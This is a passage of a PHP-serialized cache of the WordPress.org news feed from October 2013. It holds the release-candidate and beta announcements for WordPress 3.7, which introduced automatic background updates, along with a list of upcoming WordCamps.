href=\"http://profiles.wordpress.org/rboren\">rboren</a>, <a href=\"http://profiles.wordpress.org/greuben\">Reuben Gunday</a>, <a href=\"http://profiles.wordpress.org/rfair404\">rfair404</a>, <a href=\"http://profiles.wordpress.org/iamfriendly\">Richard Tape</a>, <a href=\"http://profiles.wordpress.org/r3df\">Rick Radko</a>, <a href=\"http://profiles.wordpress.org/miqrogroove\">Robert Chapin</a>, <a href=\"http://profiles.wordpress.org/rdall\">Robert Dall</a>, <a href=\"http://profiles.wordpress.org/rodrigosprimo\">Rodrigo Primo</a>, <a href=\"http://profiles.wordpress.org/wpmuguru\">Ron Rennick</a>, <a href=\"http://profiles.wordpress.org/rpattillo\">rpattillo</a>, <a href=\"http://profiles.wordpress.org/ryan\">Ryan Boren</a>, <a href=\"http://profiles.wordpress.org/rmccue\">Ryan McCue</a>, <a href=\"http://profiles.wordpress.org/hotchkissconsulting\">Sam Hotchkiss</a>, <a href=\"http://profiles.wordpress.org/coffee2code\">Scott Reilly</a>, <a href=\"http://profiles.wordpress.org/scottsweb\">scottsweb</a>, <a href=\"http://profiles.wordpress.org/wonderboymusic\">Scott Taylor</a>, <a href=\"http://profiles.wordpress.org/scribu\">scribu</a>, <a href=\"http://profiles.wordpress.org/scruffian\">scruffian</a>, <a href=\"http://profiles.wordpress.org/tenpura\">Seisuke Kuraishi (tenpura)</a>, <a href=\"http://profiles.wordpress.org/sergeybiryukov\">Sergey Biryukov</a>, <a href=\"http://profiles.wordpress.org/shinichin\">ShinichiN</a>, <a href=\"http://profiles.wordpress.org/pross\">Simon Prosser</a>, <a href=\"http://profiles.wordpress.org/simonwheatley\">Simon Wheatley</a>, <a href=\"http://profiles.wordpress.org/siobhan\">Siobhan</a>, <a href=\"http://profiles.wordpress.org/siobhyb\">Siobhan Bamber (siobhyb)</a>, <a href=\"http://profiles.wordpress.org/sirzooro\">sirzooro</a>, <a href=\"http://profiles.wordpress.org/solarissmoke\">solarissmoke</a>, <a href=\"http://profiles.wordpress.org/sillybean\">Stephanie Leary</a>, <a href=\"http://profiles.wordpress.org/netweb\">Stephen Edgar (@netweb)</a>, <a href=\"http://profiles.wordpress.org/stephenharris\">Stephen Harris</a>, <a href=\"http://profiles.wordpress.org/strangerstudios\">strangerstudios</a>, <a href=\"http://profiles.wordpress.org/sweetie089\">sweetie089</a>, <a href=\"http://profiles.wordpress.org/swissspidy\">swissspidy</a>, <a href=\"http://profiles.wordpress.org/miyauchi\">Takayuki Miyauchi</a>, <a href=\"http://profiles.wordpress.org/tmtoy\">Takuma Morikawa</a>, <a href=\"http://profiles.wordpress.org/tlovett1\">Taylor Lovett</a>, <a href=\"http://profiles.wordpress.org/tivnet\">tivnet</a>, <a href=\"http://profiles.wordpress.org/tobiasbg\">TobiasBg</a>, <a href=\"http://profiles.wordpress.org/tomauger\">Tom Auger</a>, <a href=\"http://profiles.wordpress.org/toscho\">toscho</a>, <a href=\"http://profiles.wordpress.org/wpsmith\">Travis Smith</a>, <a href=\"http://profiles.wordpress.org/sorich87\">Ulrich Sossou</a>, <a href=\"http://profiles.wordpress.org/vericgar\">vericgar</a>, <a href=\"http://profiles.wordpress.org/vinod-dalvi\">Vinod Dalvi</a>, <a href=\"http://profiles.wordpress.org/westonruter\">Weston Ruter</a>, <a href=\"http://profiles.wordpress.org/wikicms\">wikicms</a>, <a href=\"http://profiles.wordpress.org/willnorris\">Will Norris</a>, <a href=\"http://profiles.wordpress.org/wojtekszkutnik\">Wojtek Szkutnik</a>, <a href=\"http://profiles.wordpress.org/wycks\">wycks</a>, <a href=\"http://profiles.wordpress.org/yoavf\">Yoav Farhi</a>, and <a href=\"http://profiles.wordpress.org/yurivictor\">Yuri Victor</a>.</p>\n<p>Enjoy what may be one of your last few manual updates. See you soon for version 3.8!</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://wordpress.org/news/2013/10/basie/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 3.7 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 23 Oct 2013 00:05:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2729\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:417:\"The second release candidate of WordPress 3.7 is now available for testing! Those of you already testing WordPress 3.7 will be updated automatically to RC2. (Nice.) If you&#8217;d like to start testing, there&#8217;s no time like the present! Try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”) or download the release candidate here (zip). Please post to the Alpha/Beta [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1183:\"<p>The second release candidate of WordPress 3.7 is now available for testing!</p>\n<p>Those of you already testing WordPress 3.7 will be updated automatically to RC2. (<em>Nice.</em>) If you&#8217;d like to start testing, there&#8217;s no time like the present! Try the <a href=\"http://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”) or <a href=\"http://wordpress.org/wordpress-3.7-RC2.zip\">download the release candidate here</a> (zip). Please post to the <a href=\"http://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area in the support forums</a> if you think you&#8217;ve found a bug, and if any known issues are raised, you’ll be able to <a href=\"http://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>Developers, please test your plugins and themes against WordPress 3.7. If there is a compatibility issue, let us know as soon as possible so we can deal with it before the final release.</p>\n<p>For more on WordPress 3.7, check out the <a href=\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate/\">announcement post for Release Candidate 1</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Upcoming WordCamps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/news/2013/10/upcoming-wordcamps-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wordpress.org/news/2013/10/upcoming-wordcamps-4/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 22 Oct 2013 19:25:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2723\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:368:\"WordCamps are casual, locally-organized conferences that celebrate everything related to WordPress, and are a great opportunity to meet other WordPress users and professionals in your community. This has been a great year for WordCamps &#8212; there have been 56 so far in more than 20 countries, and there another 15 on the calendar before the year&#8217;s [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Jen Mylo\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3584:\"<p><a href=\"http://central.wordcamp.org/\">WordCamps</a> are casual, locally-organized conferences that celebrate everything related to WordPress, and are a great opportunity to meet other WordPress users and professionals in your community. This has been a great year for WordCamps &#8212; there have been 56 so far in more than 20 countries, and there another 15 on the calendar before the year&#8217;s over. If there&#8217;s one near you, check it out! In addition to getting to know your local WordPress community, most WordCamps attract some traveling visitors a well, giving you the chance to meet contributors to the WordPress open source project and <a href=\"http://make.wordpress.org/\">get involved</a> yourself.</p>\n<p>Here are the WordCamps on the schedule for the rest of this year.</p>\n<p>October 25-27: <strong><a href=\"http://2013.boston.wordcamp.org/\">WordCamp Boston</a></strong>, Boston, MA, USA<br />\nOctober 25-26: <strong><a href=\"http://2013.malaga.wordcamp.org/\">WordCamp Malaga</a></strong>, Spain<br />\nOctober 26: <strong><a href=\"http://2013.nepal.wordcamp.org/\">WordCamp Nepal</a></strong>, Kathmandu, Nepal<br />\nOctober 26: <strong><a href=\"http://2013.sofia.wordcamp.org/\">WordCamp Sofia</a></strong>, Bulgaria<br />\nNovember 7: <strong><a href=\"http://2013.capetown.wordcamp.org/\">WordCamp Cape Town</a></strong>, South Africa<br />\nNovember 9: <strong><a href=\"http://2013.porto.wordcamp.org/\">WordCamp Porto</a></strong>, Portugal<br />\nNovember 9-10: <strong><a href=\"http://2013.kenya.wordcamp.org/\">WordCamp Kenya</a></strong>, Nairobi, Kenya<br />\nNovember 15: <strong><a href=\"http://2013.edmonton.wordcamp.org/\">WordCamp Edmonton</a></strong>, AB, Canada<br />\nNovember 16-17: <strong><a href=\"http://2013.orlando.wordcamp.org/\">WordCamp Orlando</a></strong>, FL, USA<br />\nNovember 16: <strong><a href=\"http://2013.denver.wordcamp.org/\">WordCamp Denver</a></strong>, CO, USA<br />\nNovember 23-24: <strong><a href=\"http://2013.london.wordcamp.org/\">WordCamp London</a></strong>, UK<br />\nNovember 23-24: <strong><a href=\"http://2013.raleigh.wordcamp.org/\">WordCamp Raleigh</a></strong>, NC, USA<br />\nNovember 23: <strong><a href=\"http://2013.saopaulo.wordcamp.org/\">WordCamp São Paulo</a></strong>, Brazil<br />\nDecember 14: <strong><a href=\"http://2013.vegas.wordcamp.org/\">WordCamp Las Vegas</a></strong>, NV, USA<br />\nDecember 14-15: <strong><a href=\"http://2013.sevilla.wordcamp.org/\">WordCamp Sevilla</a></strong>, Spain</p>\n<p>No WordCamps on this list in your area? Not to worry! There are thriving <a href=\"http://wordpress.meetup.com/\">WordPress meetups</a> all over the world where you can meet like-minded people, and we maintain a library of <a href=\"http://wordpress.tv/category/wordcamptv/\">WordCamp videos</a> at <a href=\"http://wordpress.tv/\">WordPress.tv</a>.</p>\n<h3>Get Involved</h3>\n<ul>\n<li>If you&#8217;re interested in organizing a WordCamp in your area, check out our <a href=\"http://plan.wordcamp.org/\">WordCamp planning</a> site.</li>\n<li>If you&#8217;re interested in <a href=\"http://make.wordpress.org/community/meetup-interest-form/\">starting a WordPress meetup</a> in your area, let us know and we can set up a group on meetup.com for you.</li>\n<li>And speaking of WordCamp videos, we&#8217;ve recently enabled volunteer-generated subtitles/closed captioning of the videos on WordPress.tv to make them more accessible. Interested in helping? Check out the <a href=\"http://wordpress.tv/using-amara-org-to-caption-or-subtitle-a-wordpress-tv-video/\">WordPress.tv subtitling instructions</a>.</li>\n</ul>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wordpress.org/news/2013/10/upcoming-wordcamps-4/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"WordPress 3.7 Release Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 18 Oct 2013 19:52:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2718\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:331:\"The first release candidate for WordPress 3.7 is now available! In RC 1, we&#8217;ve made some adjustments to the update process to make it more reliable than ever. We hope to ship WordPress 3.7 next week, but we need your help to get there. If you haven’t tested 3.7 yet, there’s no time like the present. (Please, [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2237:\"<p>The first release candidate for WordPress 3.7 is now available!</p>\n<p>In RC 1, we&#8217;ve made some adjustments to the update process to make it more reliable than ever. We hope to ship WordPress 3.7 <em>next week</em>, but we need your help to get there. If you haven’t tested 3.7 yet, there’s no time like the present. (Please, not on a production site, unless you’re adventurous.)</p>\n<p>WordPress 3.7 introduces <strong>automatic background updates</strong> for security and minor releases (like updating from 3.7 to 3.7.1). These are really easy to test  — RC 1 will update every 12 hours or so to the latest development version, and then email you the results. (You may get two emails: one for debugging, and one all users of 3.7 will receive.) If something went wrong, you can report it.</p>\n<p><strong>Think you’ve found a bug? </strong>Please post to the <a href=\"http://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area in the support forums</a>. If any known issues come up, you’ll be able to <a href=\"http://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 3.7 RC1, try the <a href=\"http://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"http://wordpress.org/wordpress-3.7-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what&#8217;s new in WordPress 3.7, visit the awesome About screen in your dashboard (<strong><img alt=\"\" src=\"http://core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png\" /> → About</strong> in the toolbar). There, you can also see if your install is eligible for background updates. WordPress won’t automatically update, for example, if you’re using version control like Subversion or Git.</p>\n<p><strong>Developers,</strong> please test your plugins and themes against WordPress 3.7, so that if there is a compatibility issue, we can figure it out before the final release. Make sure you post any issues to the support forums.</p>\n<p><em>WordPress three seven</em><br />\n<em>A self-updating engine</em><br />\n<em>Lies beneath the hood</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wordpress.org/news/2013/10/wordpress-3-7-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 3.7 Beta 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/news/2013/10/wordpress-3-7-beta-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"http://wordpress.org/news/2013/10/wordpress-3-7-beta-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 10 Oct 2013 21:28:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=2706\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:357:\"WordPress 3.7 Beta 2 is now available for download and testing. This is software still in development, so we don&#8217;t recommend that you run it on a production site. This has been a quiet beta period. We&#8217;re hoping to get some more testers for automatic background updates, which will occur for security and minor releases (like updating [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2108:\"<p>WordPress 3.7 Beta 2 is now available for download and testing. This is software still in development, so we don&#8217;t recommend that you run it on a production site.</p>\n<p>This has been a quiet beta period. We&#8217;re hoping to get some more testers for <strong>automatic background updates</strong>, which will occur for security and minor releases (like updating from 3.7 to 3.7.1). It&#8217;s really easy to test this, as Beta 2 will update each day to the latest development version and then email you the results. If something goes wrong, you can report it — it&#8217;s that simple. To get the beta, try the <a href=\"http://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you&#8217;ll want &#8220;bleeding edge nightlies&#8221;). Or you can <a href=\"http://wordpress.org/wordpress-3.7-beta2.zip\">download the beta here</a> (zip). Check out <strong>Dashboard → Updates</strong> to see if your install is eligible for background updates. WordPress won&#8217;t update if, for example, you&#8217;re using version control like SVN or Git.</p>\n<p>For more of what&#8217;s new in version 3.7, <a title=\"WordPress 3.7 Beta 1\" href=\"http://wordpress.org/news/2013/09/wordpress-3-7-beta-1/\">check out the Beta 1 blog post</a>. In Beta 2, we further increased the stability of background updates and also added about 50 bug fixes, including a fix for Internet Explorer 11 in the visual editor.</p>\n<p>If you think you’ve found a bug, you can post to the <a href=\"http://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums. Or, if you’re comfortable writing a bug report, <a href=\"http://core.trac.wordpress.org/\">file one on the WordPress Trac</a>. There, you can also find <a href=\"http://core.trac.wordpress.org/report/5\">a list of known bugs</a> and <a href=\"http://core.trac.wordpress.org/query?status=closed&amp;group=component&amp;milestone=3.7\">everything we’ve fixed</a>.</p>\n<p>Happy testing!</p>\n<p><em>Beta 2 released<br />\nDotting i&#8217;s and crossing t&#8217;s</em><br />\n<em>Expect RC next</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wordpress.org/news/2013/10/wordpress-3-7-beta-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 3.7 Beta 